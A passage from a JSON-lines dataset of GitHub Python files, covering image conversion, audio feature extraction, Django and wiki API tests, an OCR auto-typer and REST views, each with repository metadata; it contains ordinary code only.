labels_batch = tf.train.batch([image, label], batch_size=64, capacity=2000)\n\nglobal_step = tf.Variable(0, trainable=False)\n\n\ndest_dir = \"TF_JPG\"\nif not os.path.exists(dest_dir):\n os.mkdir(dest_dir)\nif not os.path.exists('dest_dir/0'):\n os.mkdir(os.path.join(dest_dir, \"0\"))\nif not os.path.exists('dest_dir/1'):\n os.mkdir(os.path.join(dest_dir, \"1\"))\nif not os.path.exists('dest_dir/2'):\n os.mkdir(os.path.join(dest_dir, \"2\"))\nif not os.path.exists('dest_dir/3'):\n os.mkdir(os.path.join(dest_dir, \"3\"))\nif not os.path.exists('dest_dir/4'):\n os.mkdir(os.path.join(dest_dir, \"4\"))\n\ntotal_images = 55890\n\nwith tf.Session() as sess:\n sess.run(tf.global_variables_initializer())\n sess.run(tf.local_variables_initializer())\n\n coord = tf.train.Coordinator()\n threads = tf.train.start_queue_runners(coord=coord)\n\n counter = 0\n while counter < total_images:\n la_b, im_b = sess.run([labels_batch, images_batch])\n\n # go through each image in the batch and save it to a directory depending on its class\n for image, label in zip(im_b, la_b):\n # create the filename from the counter so each image has a distinct name\n filename = str(counter) + \".jpg\"\n\n # put the image in a directory according to its label\n image_dir = os.path.join(dest_dir, str(label))\n\n # reshape the image\n image = image.reshape((299,299))\n\n # save the image\n imsave(os.path.join(image_dir, filename), image)\n\n counter += 1\n coord.request_stop()\n\n # Wait for threads to stop\n coord.join(threads)\n\n\n# In[ ]:\n","repo_name":"Staritino/Deep-Learning-for-Breast-Cancer-Prediction","sub_path":"Tfrecords_to_jpg.py","file_name":"Tfrecords_to_jpg.py","file_ext":"py","file_size_in_byte":3340,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"2062431639","text":"# -*- coding: utf-8 -*-\n\nimport ingestor\nimport logging\nimport requests\nimport quandl\n\nfrom ingestor import IngestorItf \nfrom processor import ProcessorItf \nfrom exporter import ExporterItf \n\n\n\nclass OrchestratorIpe( object ):\n \"\"\"Implementation of an orchestrator for a standardized Ingest Procell Export process,\n The class is a demo with bare minimum fringes.\"\"\"\n\n def __init__(self, ingestor, processor, exporter):\n self.logger = logging.getLogger(__name__)\n if not isinstance(ingestor, IngestorItf):\n raise ValueError('first argument must be a IngestorItf')\n self.ingestor = ingestor\n if not isinstance(processor, ProcessorItf):\n raise ValueError('second argument must be a ProcessorItf')\n self.processor = processor\n if not isinstance(exporter, ExporterItf):\n raise ValueError('third argument must be a ExporterItf')\n self.exporter = exporter\n\n\n def doIpe(self, ts_name):\n # Ingest data\n try: # recoverable failures are handled by the connector using exponential backoff\n data = self.ingestor.get_data(ts_name);\n except (requests.exceptions.Timeout,\n requests.exceptions.ConnectionError) as e:\n self.logger.info('Exceded number of attempts on recoverable failure', exc_info=True)\n raise\n except (quandl.errors.quandl_error.AuthenticationError,\n requests.exceptions.TooManyRedirects) as e:\n self.logger.info('Unrecoverable failure', exc_info=True)\n raise\n\n # process data\n data = self.processor.process(data,0)\n\n # Export data\n jsonData = self.exporter.export_data(ts_name, data)\n\n return jsonData;\n\n","repo_name":"ringhiera/butterwire","sub_path":"butterwire/orchestrator.py","file_name":"orchestrator.py","file_ext":"py","file_size_in_byte":1611,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"17354204701","text":"# -*- coding: utf-8 -*-\n\n# -- stdlib --\nfrom pathlib import Path\nimport logging\nimport os\nimport shutil\nimport tempfile\nimport types\n\n# -- third party --\nimport numpy as np\nimport taichi as ti\n\n# -- own --\nfrom .common import register\nfrom args import options, parser\nfrom exceptions import Failed\n\n# -- code --\nparser.add_argument('--generate-captures', action='store_true')\nparser.add_argument('--save-compare-dir', type=str, default=os.getcwd() + '/bad-compare')\n\n# def _get_gaussian_coef(radius):\n# from math import erfc\n# a = 3.0 / radius * 0.707106781\n# f = lambda x: 0.5*erfc(-x*a)\n# l = [f(0.5 + i) - f(-0.5 + i) for i in range(radius+1)]\n# l = [i for i in l if i>0.01]\n# l = list(reversed(l[1:])) + l\n# s = sum(l)\n# l = [i/s for i in l]\n# return l\n\n\nGAUSSIAN_COEFF = [\n 0.01449797497581252,\n 0.04928451699227458,\n 0.11807162656393803,\n 0.19941115896256947,\n 0.23746944501081074,\n 0.19941115896256947,\n 0.11807162656393803,\n 0.04928451699227458,\n 0.01449797497581252,\n]\n\n\n@ti.kernel\ndef rmse(a: ti.template(), b: ti.template()) -> ti.f32:\n assert a.shape == b.shape\n acc: ti.f32 = 0\n for i, j in a:\n v = a[i, j] - b[i, j]\n acc += (v * v).sum()\n return ti.sqrt(acc / a.shape[0] / a.shape[1])\n\n\n@ti.kernel\ndef sum_difference(a: ti.template(), b: ti.template()) -> ti.i32:\n assert a.shape == b.shape\n acc: ti.i32 = 0\n for i, j in a:\n for k in ti.static(range(3)):\n v: ti.i32 = a[i, j][k] - b[i, j][k]\n acc += ti.abs(v)\n return acc\n\n\n@ti.kernel\ndef pixel_count(a: ti.template(), b: ti.template()) -> ti.i32:\n assert a.shape == b.shape\n acc: ti.i32 = 0\n for i, j in a:\n if any(a[i, j] != b[i, j]):\n acc += 1\n return acc\n\n\n@ti.kernel\ndef gaussian_blur(a: ti.template(), aux: ti.template()):\n assert a.shape == aux.shape\n for i, j in a:\n acc = ti.Vector([0.0, 0.0, 0.0])\n for k in ti.static(range(-4, 5)):\n acc += GAUSSIAN_COEFF[k + 4] * a[i, j+k]\n aux[i, j] = ti.cast(acc, ti.i16)\n\n for i, j in a:\n acc = ti.Vector([0.0, 0.0, 0.0])\n for k in ti.static(range(-4, 5)):\n acc += GAUSSIAN_COEFF[k + 4] * aux[i+k, j]\n a[i, j] = ti.cast(acc, ti.i16)\n\n\n@ti.kernel\ndef naive_downscale(img: ti.types.ndarray(dtype=ti.math.vec4), downscaled: ti.types.ndarray(dtype=ti.math.vec4)):\n for i, j in downscaled:\n acc = ti.Vector([0.0, 0.0, 0.0, 0.0])\n for k in ti.static(range(2)):\n for l in ti.static(range(2)):\n acc += img[i * 2 + k, j * 2 + l]\n downscaled[i, j] = ti.cast(acc / 4, ti.u8)\n\n\nismodule = lambda obj, name: isinstance(obj, types.ModuleType) and obj.__name__ == name\n\n# -- code --\ndef capture(gui, path):\n if gui is None:\n return\n\n if isinstance(gui, ti.ui.Window):\n gui.save_image(str(path))\n elif isinstance(gui, ti.GUI):\n gui.core.screenshot(str(path))\n elif ismodule(gui, 'matplotlib.pyplot'):\n import matplotlib.pyplot as plt\n plt.savefig(str(path))\n plt.close()\n elif ismodule(gui, 'cv2'):\n import cv2\n cv2.imwrite.orig(str(path), cv2._imshow_image)\n\n\n@register('__reset:matplotlib')\ndef reset_matplotlib():\n try:\n import matplotlib.pyplot as plt\n plt.close()\n except Exception:\n pass\n\n\n@register('capture-and-compare')\ndef capture_and_compare(dry, gui, compare, ground_truth, threshold):\n if dry:\n return\n\n truth_path = Path(ground_truth).resolve()\n if options.generate_captures:\n truth_path.parent.mkdir(parents=True, exist_ok=True)\n logging.getLogger('capture').info(f'Generating {truth_path}')\n capture(gui, truth_path)\n return\n\n td = Path(tempfile.mkdtemp())\n capture(gui, td / 'capture.png')\n\n def save_bad_compare():\n save_dir = Path(options.save_compare_dir)\n save_dir.mkdir(parents=True, exist_ok=True)\n basename, extname = truth_path.name.rsplit('.', 1)\n shutil.copy(truth_path, save_dir / f'{basename}.truth.{extname}')\n shutil.move(str(td / 'capture.png'), save_dir / f'{basename}.capture.png')\n shutil.rmtree(td, ignore_errors=True)\n\n captured = ti.tools.imread(str(td / 'capture.png'))\n truth = ti.tools.imread(str(truth_path))\n if list(captured.shape[:2]) == [i * 2 for i in truth.shape[:2]]:\n # retina, downscale first\n captured = np.ascontiguousarray(captured)\n downscaled = np.ascontiguousarray(np.zeros_like(truth))\n naive_downscale(captured, downscaled)\n captured = downscaled\n elif captured.shape != truth.shape:\n save_bad_compare()\n raise Failed('capture-and-compare shape mismatch!')\n\n f_captured = ti.Vector.field(3, dtype=ti.i16, shape=captured.shape[:2])\n f_truth = ti.Vector.field(3, dtype=ti.i16, shape=truth.shape[:2])\n f_captured.from_numpy(np.ascontiguousarray(captured[:, :, :3]))\n f_truth.from_numpy(np.ascontiguousarray(truth[:, :, :3]))\n\n pixels = f_captured.shape[0] * f_captured.shape[1]\n if compare == 'rmse':\n diff = rmse(f_captured, f_truth)\n if isinstance(threshold, str) and threshold.endswith('%'):\n threshold = float(threshold[:-1]) / 100 * 255\n elif compare == 'sum-difference':\n diff = sum_difference(f_captured, f_truth)\n if isinstance(threshold, str) and threshold.endswith('%'):\n threshold = float(threshold[:-1]) / 100 * pixels * 3 * 255\n elif compare == 'blur-sum-difference':\n f_aux = ti.Vector.field(3, dtype=ti.i16, shape=truth.shape[:2])\n gaussian_blur(f_captured, f_aux)\n gaussian_blur(f_truth, f_aux)\n diff = sum_difference(f_captured, f_truth)\n if isinstance(threshold, str) and threshold.endswith('%'):\n threshold = float(threshold[:-1]) / 100 * pixels * 3 * 255\n elif compare == 'pixel-count':\n diff = pixel_count(f_captured, f_truth)\n if isinstance(threshold, str) and threshold.endswith('%'):\n threshold = float(threshold[:-1]) / 100 * pixels\n else:\n raise ValueError(f'Unknown compare method: {compare}')\n\n if diff > threshold:\n save_bad_compare()\n raise Failed(f'capture-and-compare failed! diff({diff}) > threshold({threshold})')\n\n shutil.rmtree(td, ignore_errors=True)\n","repo_name":"taichi-dev/taichi-release-tests","sub_path":"actions/capture.py","file_name":"capture.py","file_ext":"py","file_size_in_byte":6355,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"29256314217","text":"import pytest\nimport unittest.mock as mock\n\nfrom maps.garden.modules.carparks_validator.lib import graph\nfrom maps.garden.modules.carparks_validator.lib.task import (\n ValidationTask, _get_mail_subject, _get_error_report)\nfrom maps.garden.sdk.core import DataValidationWarning, GardenError, Version\nfrom maps.garden.sdk.resources import PythonResource\n\n\nRUN_VALIDATION = \\\n \"maps.garden.modules.carparks_validator.lib.task._run_validation\"\nSEND_REPORT = \\\n \"maps.garden.modules.carparks_validator.lib.task._send_report\"\nUPLOAD_REPORT_TO_SANDBOX = \\\n \"maps.garden.modules.carparks_validator.lib.task.upload_report_to_sandbox\"\n\nDATA_VERSION = \"20010101\"\n\n\ndef run_validation_task(environment_settings):\n dataset_marker = PythonResource(graph.DATASET_MARKER_RESOURCE_NAME)\n dataset_marker.version = Version(properties={\n \"data_version\": DATA_VERSION})\n dataset_marker.load_environment_settings(environment_settings)\n\n validation_marker = PythonResource(graph.VALIDATION_MARKER_RESOURCE_NAME)\n validation_marker.version = Version(properties={\n \"data_version\": DATA_VERSION})\n validation_marker.load_environment_settings(environment_settings)\n\n task = ValidationTask()\n task.load_environment_settings(environment_settings)\n task(dataset_marker, validation_marker)\n\n\n@mock.patch(RUN_VALIDATION)\n@mock.patch(SEND_REPORT)\ndef test_validation_success(\n send_report_mock,\n run_validation_mock,\n environment_settings):\n\n run_validation_mock.return_value = (True, \"report\")\n\n run_validation_task(environment_settings)\n\n run_validation_mock.assert_called_once_with(\n \"[]\\n\",\n \"http://__no_such_carparks_testing_renderer__.yandex.ru\",\n \"http://__no_such_carparks_stable_renderer__.yandex.ru\")\n send_report_mock.assert_called_once_with(\n \"__no_such_smtp_server__.yandex.net\",\n \"garden-modules@yandex-team.ru\",\n [\"__no_such_mail_2__@yandex-team.ru\"],\n _get_mail_subject(\"SUCCEEDED\", DATA_VERSION),\n \"report\")\n\n\n@mock.patch(RUN_VALIDATION)\n@mock.patch(SEND_REPORT)\n@mock.patch(UPLOAD_REPORT_TO_SANDBOX)\ndef test_validation_failure(\n upload_report_to_sandbox_mock,\n send_report_mock,\n run_validation_mock,\n environment_settings):\n\n run_validation_mock.return_value = (False, \"report\")\n upload_report_to_sandbox_mock.return_value = \"https://sandbox\"\n\n with pytest.raises(DataValidationWarning):\n run_validation_task(environment_settings)\n\n upload_report_to_sandbox_mock.assert_called_once_with(\n \"report\", \"carparks_validator\", environment_settings\n )\n run_validation_mock.assert_called_once_with(\n \"[]\\n\",\n \"http://__no_such_carparks_testing_renderer__.yandex.ru\",\n \"http://__no_such_carparks_stable_renderer__.yandex.ru\")\n send_report_mock.assert_called_once_with(\n \"__no_such_smtp_server__.yandex.net\",\n \"garden-modules@yandex-team.ru\", [\n \"__no_such_mail_1__@yandex-team.ru\",\n \"__no_such_mail_2__@yandex-team.ru\"],\n _get_mail_subject(\"FAILED\", DATA_VERSION),\n \"report\")\n\n\n@mock.patch(RUN_VALIDATION)\n@mock.patch(SEND_REPORT)\ndef test_validation_error(\n send_report_mock,\n run_validation_mock,\n environment_settings):\n\n err = RuntimeError(\"error\")\n run_validation_mock.return_value = (False, \"report\")\n run_validation_mock.side_effect = err\n\n with pytest.raises(GardenError):\n run_validation_task(environment_settings)\n\n run_validation_mock.assert_called_once_with(\n \"[]\\n\",\n \"http://__no_such_carparks_testing_renderer__.yandex.ru\",\n \"http://__no_such_carparks_stable_renderer__.yandex.ru\")\n send_report_mock.assert_called_once_with(\n \"__no_such_smtp_server__.yandex.net\",\n \"garden-modules@yandex-team.ru\", [\n \"__no_such_mail_1__@yandex-team.ru\",\n \"__no_such_mail_2__@yandex-team.ru\"],\n _get_mail_subject(\"ERROR\", DATA_VERSION),\n _get_error_report(err))\n","repo_name":"Alexander-Berg/2022-tests-examples","sub_path":"maps/tests/test_task.py","file_name":"test_task.py","file_ext":"py","file_size_in_byte":4032,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"8219239242","text":"# Valid PAN format\n# https://www.hackerrank.com/challenges/valid-pan-format/problem\n \nimport re \n\nregex = r'^[A-Z]{5}\\d{4}[A-Z]$'\n\nn = int(input())\nfor _ in range(n):\n texto = input()\n if bool(re.findall(regex, texto)):\n print(\"YES\")\n else:\n print(\"NO\")\n","repo_name":"Bonfim-luiz/HackerRank","sub_path":"HackerRank_Regex/Valid_PAN_format.py","file_name":"Valid_PAN_format.py","file_ext":"py","file_size_in_byte":263,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"22187825351","text":"#dictionaries are indexed by keys, which can be any immutable type;\n# strings and numbers can always be keys.\n#\n# Tuples can be used as keys if they contain only strings, numbers, or tuples;\n#\n# if a tuple contains any mutable object either directly or indirectly, it cannot be used as a key.\n#\n# You can’t use lists as keys, since lists can be modified in place using index assignments,\n# slice assignments, or methods like append() and extend().\n\n#Note that dictionaries in python are not sorted.\n# You can use collections.OrderedDict for this.\n# Also to build correct sorting use sort/sorted functions with parameter\n# key specified to sort the way you want\n\nfrom itertools import product\nmyDict = {}\nfor x,y,z in product(range(10), range(10,20), range(20,30)):\n myDict[(x,y,z)] = sum([x,y,z])","repo_name":"iuyt9003/pythonexamples","sub_path":"examples/data-types-basic/dictionary_with_tuple_key.py","file_name":"dictionary_with_tuple_key.py","file_ext":"py","file_size_in_byte":801,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"29031570097","text":"\nfrom rest_framework import status\nfrom ujson import loads\n\nfrom wiki.notifications.models import PageEvent\nfrom wiki.pages.models import Page, PageWatch\nfrom intranet.wiki.tests.wiki_tests.common.unittest_base import BaseApiTestCase, now_for_tests\n\n\nclass APICreateGridHandlerTest(BaseApiTestCase):\n \"\"\"\n Tests for pages api handlers\n \"\"\"\n\n def setUp(self):\n super(APICreateGridHandlerTest, self).setUp()\n self.setUsers()\n self.client.login('thasonic')\n self.user = self.user_thasonic\n\n def _test_success(self, tag, url=None, inherited_watchers=tuple()):\n title = 'тест тайтл'\n momentBefore = now_for_tests()\n\n if url is None:\n url = '/' + tag\n request_url = '{api_url}/{page_tag}/.grid/create'.format(api_url=self.api_url, page_tag=tag)\n response = self.client.post(request_url, data={'title': ' ' + title + ' '})\n\n # проверка ответа\n self.assertEqual(200, response.status_code)\n data = loads(response.content)['data']\n self.assertEqual(data['page_type'], 'grid')\n self.assertEqual(data['tag'], tag)\n self.assertEqual(data['url'], url)\n\n # проверка созданного грида\n grid = Page.active.get(tag=tag)\n momentAfter = now_for_tests()\n self.assertEqual(grid.page_type, Page.TYPES.GRID)\n self.assertTrue(self.user in grid.get_authors())\n self.assertEqual(grid.last_author, self.user)\n self.assertEqual(grid.title, title)\n self.assertTrue(momentBefore <= grid.created_at <= momentAfter)\n\n # проверка наблюдателей\n watches = list(PageWatch.objects.filter(page=grid))\n self.assertEqual(len(watches), 1 + len(inherited_watchers))\n actual_watchers = tuple()\n for watch in watches:\n actual_watchers += (watch.user,)\n self.assertTrue(watch.is_cluster)\n self.assertTrue(momentBefore <= watch.created_at <= momentAfter)\n expected_watchers = (self.user.username,) + inherited_watchers\n self.assertEqual(set(expected_watchers), set(actual_watchers))\n\n # проверка нотификации\n event = PageEvent.objects.get(page=grid)\n self.assertEqual(event.author, self.user)\n self.assertEqual(event.event_type, PageEvent.EVENT_TYPES.create)\n self.assertTrue(momentBefore <= event.created_at <= momentAfter)\n\n # проверка, что получение грида работает\n request_url = '{api_url}{page_url}'.format(api_url=self.api_url, page_url=url)\n response = self.client.get(request_url)\n self.assertEqual(200, response.status_code)\n data = loads(response.content)['data']\n self.assertEqual(data['title'], title)\n self.assertEqual(data['page_type'], 'grid')\n self.assertEqual(data['tag'], tag)\n self.assertEqual(data['url'], url)\n\n def test_success_root(self):\n \"\"\"\n Успешное создание на верхнем уровне (в смысле тэга).\n \"\"\"\n self._test_success(tag='ТестГрид', url='/testgrid')\n\n def test_success_child(self):\n \"\"\"\n Успешное создание не на верхнем уровне (в смысле тэга).\n \"\"\"\n\n # родительская страница есть, насле��уемых наблюдателей нет\n self.create_page(tag='РоотТаг', body='body')\n self._test_success('РоотТаг/ТестГрид', url='/roottag/testgrid')\n\n # родительская страница есть, наследуемые наблюдатели есть\n page = self.create_page(tag='roottag2', authors_to_add=[self.user_kolomeetz])\n PageWatch(user=self.user_kolomeetz.username, page=page, is_cluster=True).save()\n self._test_success(tag='roottag2/testgrid', inherited_watchers=(self.user_kolomeetz.username,))\n\n def _test_invalid(self, tag, data):\n request_url = '{api_url}/{page_supertag}/.grid/create'.format(api_url=self.api_url, page_supertag=tag)\n response = self.client.post(request_url, data=data)\n\n # проверка ответа\n self.assertEqual(status.HTTP_409_CONFLICT, response.status_code)\n return loads(response.content)['error']\n\n def _test_invalid_title(self, tag, data):\n error_data = self._test_invalid(tag, data)\n self.assertEqual(error_data['error_code'], 'CLIENT_SENT_INVALID_DATA')\n self.assertTrue(len(error_data['errors']['title']) > 0)\n\n def test_invalid(self):\n tag = 'testgrid'\n self._test_invalid_title(tag, {})\n self._test_invalid_title(tag, {'title': ''})\n self._test_invalid_title(tag, {'title': ' '})\n\n # проверка отсутствия грида\n self.assertFalse(Page.active.filter(supertag=tag).exists())\n\n def test_already_exists(self):\n tag = 'testgrid'\n self.create_page(tag=tag)\n request_url = '{api_url}/{page_supertag}/.grid/create'.format(api_url=self.api_url, page_supertag=tag)\n response = self.client.post(request_url, data={'title': 'тайтл'})\n\n # проверка ответа\n self.assertEqual(status.HTTP_409_CONFLICT, response.status_code)\n error = loads(response.content)['error']\n self.assertEqual(error['error_code'], 'ALREADY_EXISTS')\n\n def test_cant_create_grid_over_page(self):\n supertag = 'super/tag'\n\n page_data = {'title': 'Title', 'body': 'Body'}\n\n request_url = '{api_url}/{page_supertag}'.format(api_url=self.api_url, page_supertag=supertag)\n response = self.client.post(request_url, data=page_data)\n self.assertEqual(200, response.status_code)\n\n request_url = '{api_url}/{page_supertag}/.grid/create'.format(api_url=self.api_url, page_supertag=supertag)\n response = self.client.post(request_url, data={'title': 'Test'})\n self.assertEqual(response.status_code, 409)\n\n # Страница не изменилась\n request_url = '{api_url}/{page_supertag}/.raw'.format(api_url=self.api_url, page_supertag=supertag)\n response = self.client.get(request_url)\n self.assertEqual(200, response.status_code)\n data = loads(response.content)['data']\n self.assertEqual(data['body'], 'Body')\n","repo_name":"Alexander-Berg/2022-tests-examples","sub_path":"Intranet/wiki_tests/unit_unittest/api_frontend/test_create_grid.py","file_name":"test_create_grid.py","file_ext":"py","file_size_in_byte":6440,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"39607154457","text":"import numpy as np\nimport pandas as pd\nfrom librosa.core import stft\nfrom librosa.feature import melspectrogram\nimport librosa\nfrom src.feature_extraction import call_s3\nimport matplotlib.pyplot as plt\n\nclass prep:\n # Preprocessing settings\n sampling_rate = 22050\n duration = 10 # seconds to trim down if long data\n hop_length = 512 # to make time steps\n frames = 86\n fmin = 20\n fmax = sampling_rate\n n_mels = 60\n n_fft = n_mels * 20 #Fast Fourier Transform\n samples = sampling_rate * duration\n window_length = 1024 #for STFT\n window_size = (sampling_rate // hop_length) * 5 # a second window\n window_hop = window_size // 4 # amount to hop during snapshot\n \n # 1 frame ~= 1/43 second (sample rate / hop length)\n # 21.5 frames = 0.5 seconds\n\n\ndef read_audio(prep, s3_client, bucket_name, fname, s3_folder, trim_long_data):\n data_stream = call_s3(s3_client, bucket_name, fname, s3_folder)\n try:\n y, sr = librosa.load(data_stream, sr=prep.sampling_rate)\n except(RuntimeError, TypeError):\n return np.array([])\n # trim silence\n if 0 < len(y): # workaround: 0 length causes error\n y, _ = librosa.effects.trim(y) # trim, top_db=default(60)\n # make it unified length to conf.samples\n if len(y) > prep.samples: # long enough\n if trim_long_data:\n y = y[0:0+prep.samples]\n else: # pad blank\n padding = prep.samples - len(y) # add padding at both ends\n offset = padding // 2\n y = np.pad(y, (offset, prep.samples - len(y) - offset), 'constant')\n return y, sr\n\n\ndef load_audio_windows(prep, label, fname, s3_client, bucket_name, s3_folder, trim_long_data):\n try:\n y, sr = read_audio(prep, s3_client, bucket_name, fname, s3_folder, trim_long_data)\n except ValueError:\n return [np.zeros((1, prep.n_mels * int(prep.window_size)))]\n S = stft(y, n_fft=prep.n_fft,\n hop_length=prep.hop_length, win_length=prep.window_length)\n mels = melspectrogram(y=y, sr=sr, S=S,\n n_mels=prep.n_mels, fmin=prep.fmin, fmax=prep.fmax)\n\n window_size = int(prep.window_size)\n window_hop = int(prep.window_hop)\n #truncation method\n start_frame = window_size\n end_frame = mels.shape[1] - window_hop \n windows = []\n for frame_idx in range(start_frame, end_frame, window_hop):\n # grab a slice of the spectogram at once\n win = mels[:, frame_idx-window_size:frame_idx]\n #normalize within frame\n # win = librosa.core.power_to_db(win, top_db=80)\n win = np.log(win + 1e-9) \n win -= np.mean(win)\n win /= np.std(win)\n# print(win.shape)\n win = np.hstack(win)\n win = np.append(win, label)\n win = np.append(win, fname)\n windows.append(win)\n# assert win.shape == (prep.n_mels, prep.window_size)\n return windows\n\ndef mel_windowed(df, batch, prep, s3_client, bucket_name, s3_folder, trim_long_data=True):\n acc = []\n labs = []\n i=0\n for row in df.iloc[:batch,:].iterrows():\n print(i, \" \", row[1][1])\n i += 1\n windows = load_audio_windows(prep=prep, \n label=row[1][1],\n fname=row[1][0],\n s3_client=s3_client,\n bucket_name=bucket_name, \n s3_folder=s3_folder, \n trim_long_data=trim_long_data)\n # windows = flatten(windows)\n for win in windows:\n acc.append(win[:-1])\n labs.append(win[-1])\n \n Meldf = pd.DataFrame(acc, labs)\n Meldf.columns = [*Meldf.columns[:-1], 'labels']\n return Meldf\n\n\ndef show_melspectrogram(prep, mels, title='Log-frequency power spectrogram', cmap='gist_ncar', i=0):\n librosa.display.specshow(mels, x_axis='time', y_axis='mel', \n sr=prep.sampling_rate, hop_length=prep.hop_length,\n fmin=prep.fmin, fmax=10000, cmap=cmap)\n plt.colorbar(format='%+2.0f dB')\n plt.title(title)\n plt.savefig('img/mel_win{}.png'.format(i), dpi=256)\n plt.show()","repo_name":"jaredkeil/sourcing-sound","sub_path":"src/mels.py","file_name":"mels.py","file_ext":"py","file_size_in_byte":4202,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"37696816075","text":"from PIL import Image, ImageGrab, ImageOps\nimport pytesseract\nimport time\nimport pynput.mouse as ms\nimport pynput.keyboard as kb\nfrom pynput.keyboard import Key, Controller\n\nkeyboard = Controller()\n\npytesseract.pytesseract.tesseract_cmd = 'C:/Program Files/Tesseract-OCR/tesseract.exe'\n\nclass AutoTyper:\n \n clickCount = 0\n pCords = [0,0,0,0]\n defined = False\n pImage = None\n \n def areaSelect():\n \n print('Click twice to define TEXT window')\n \n def on_click(x, y, button, pressed):\n \n if pressed:\n print ('Mouse clicked at ({0}, {1}) with {2}'.format(x, y, button))\n if AutoTyper.clickCount == 0:\n AutoTyper.pCords[0] = x\n AutoTyper.pCords[1] = y\n elif AutoTyper.clickCount == 1:\n AutoTyper.pCords[2] = x\n AutoTyper.pCords[3] = y\n AutoTyper.defined = True\n print('')\n AutoTyper.clickCount = 0\n return False\n AutoTyper.clickCount += 1\n \n with ms.Listener(on_click = on_click) as listener:\n listener.join()\n\n\n def keyPress():\n\n print('Press UP ARROW to select OCR region')\n \n def on_press(key):\n i = 10\n\n def on_release(key):\n if key == Key.esc:\n print('Stopping key listener')\n return False\n elif key == Key.up:\n print('UP arrow pressed\\n')\n AutoTyper.areaSelect()\n AutoTyper.capture()\n \n return False\n\n with kb.Listener(on_press = on_press, on_release = on_release) as listener:\n listener.join()\n\n\n def startTyping(delayTime: float):\n\n print('Press DOWN ARROW to start typing')\n \n def on_press(key):\n i = 10\n\n def on_release(key):\n if key == Key.esc:\n print('Stopping key listener')\n return False\n elif key == Key.down:\n print('DOWN arrow pressed\\n')\n AutoTyper.output(delayTime)\n return False\n\n with kb.Listener(on_press = on_press, on_release = on_release) as listener:\n listener.join()\n\n\n def capture():\n \n if AutoTyper.defined:\n AutoTyper.pImage = ImageGrab.grab(bbox = (AutoTyper.pCords[0],AutoTyper.pCords[1],AutoTyper.pCords[2],AutoTyper.pCords[3]))\n else:\n print('please define an area to OCR before trying to print')\n \n def output(delayTime: float):\n \n paraString = pytesseract.image_to_string(AutoTyper.pImage)\n length = len(paraString)\n\n # Character replacement to make outpur more accurate\n paraString = paraString.replace('|','I')\n paraString = paraString.replace('\\n',' ')\n \n for i in range(length):\n keyboard.press(paraString[i])\n keyboard.release(paraString[i])\n time.sleep(delayTime)\n \n print('The Processed String:\\n',paraString,'\\n')\n\n \ndef start(delayTime: float):\n \n print('Time interal between chars:',delayTime)\n AutoTyper.keyPress()\n AutoTyper.startTyping(delayTime)\n \n\n\n\n","repo_name":"Jeremy-Leon/AutoTyper-OCR-Script","sub_path":"AutoTyper.py","file_name":"AutoTyper.py","file_ext":"py","file_size_in_byte":3396,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"11153558333","text":"from django.db.models import Q\nfrom rest_framework import status\nfrom rest_framework.exceptions import ValidationError\nfrom rest_framework.generics import CreateAPIView, ListAPIView\nfrom rest_framework.response import Response\n\n\nclass GetOrCreateView(CreateAPIView):\n \"\"\"\n Similar to CreateAPIView, but retrieves an object that matches the identity fields of the input if possible.\n\n Requires a `model` that inherits from GenerateSerializerMixin, and an `identity_fields` tuple that gives\n the fields used for the lookup. Other fields submitted in the incoming data will be used as `defaults`\n in `get_or_create()`. There's also an `exclude` parameter, which can remove fields from the `default`\n serializer.\n \"\"\"\n model = None\n identity_fields = []\n exclude = []\n\n def create(self, request, *args, **kwargs):\n \"\"\"Implement the get-or-create functionality.\"\"\"\n serializers = self.model.generate_get_or_create_serializers(*self.identity_fields, exclude=self.exclude)\n context = self.get_serializer_context()\n\n # Use the `identity` serializer to parse the lookup fields.\n id_serializer = serializers[\"identity\"](data=request.data, context=context)\n id_serializer.is_valid(raise_exception=True)\n\n # The `defaults` serializer parses the rest - these will be passed to a new object being created.\n data_serializer = serializers[\"defaults\"](data=request.data, context=context)\n data_serializer.is_valid(raise_exception=True)\n\n # Use the normal Django get_or_create to perform the operation.\n # Any failures are raised as ValidationErrors.\n try:\n obj, created = self.model.objects.get_or_create(\n **id_serializer.validated_data,\n defaults=data_serializer.validated_data\n )\n except Exception as e:\n raise ValidationError(str(e))\n\n # Use the `result` serializer to return the full data back to the requester.\n response_serializer = serializers[\"result\"](obj, context=context)\n\n headers = self.get_success_headers(response_serializer.data)\n status_code = status.HTTP_201_CREATED if created else status.HTTP_200_OK\n return Response(response_serializer.data, status_code, headers=headers)\n\n def get_queryset(self):\n \"\"\"\n This function contains an assertion for self.queryset, which we don't use.\n\n We've overridden create(), which is normally where get_queryset() would be called, but the\n Django REST Framework browsable API runs into it as well. For that case, provide a default implementation.\n \"\"\"\n return self.model.objects.all()\n\n def get_serializer_class(self):\n \"\"\"\n This function contains an assertion for self.serializer_class, which we don't use (and doesn't really fit\n a view that uses three serializers).\n\n We've overridden create(), which is normally where get_serializer_class() would be called, but the\n Django REST Framework browsable API runs into it as well. As such, we need some kind of default.\n Return the model's basic serializer, with all the fields in place.\n \"\"\"\n return self.model.generate_serializer_class(exclude=self.exclude)\n\n\nclass SearchView(ListAPIView):\n \"\"\"\n Searches `self.queryset` against a given list of search terms.\n Requires `self.search_fields` to be set to have any effect.\n\n Expects `search_terms` as a URL kwarg, with individual search terms separated by spaces.\n\n Returns a list of each item in the queryset where each term in the given search terms is found at least\n once in the search fields on that item.\n\n All matches are case-insensitive (using Django's __icontains).\n\n Set self.max_results to limit the number of returned items; the default is 30. When the list of results\n is above this limit, we sneakily return one more - so the actual maximum is 31 by default. This allows\n the caller to detect that there are more than 30 results and prompt the user to narrow their search.\n\n Optionally, set an `order_results_by` to sort the results. This is a list of arguments passed to\n a Django `.order_by()` queryset 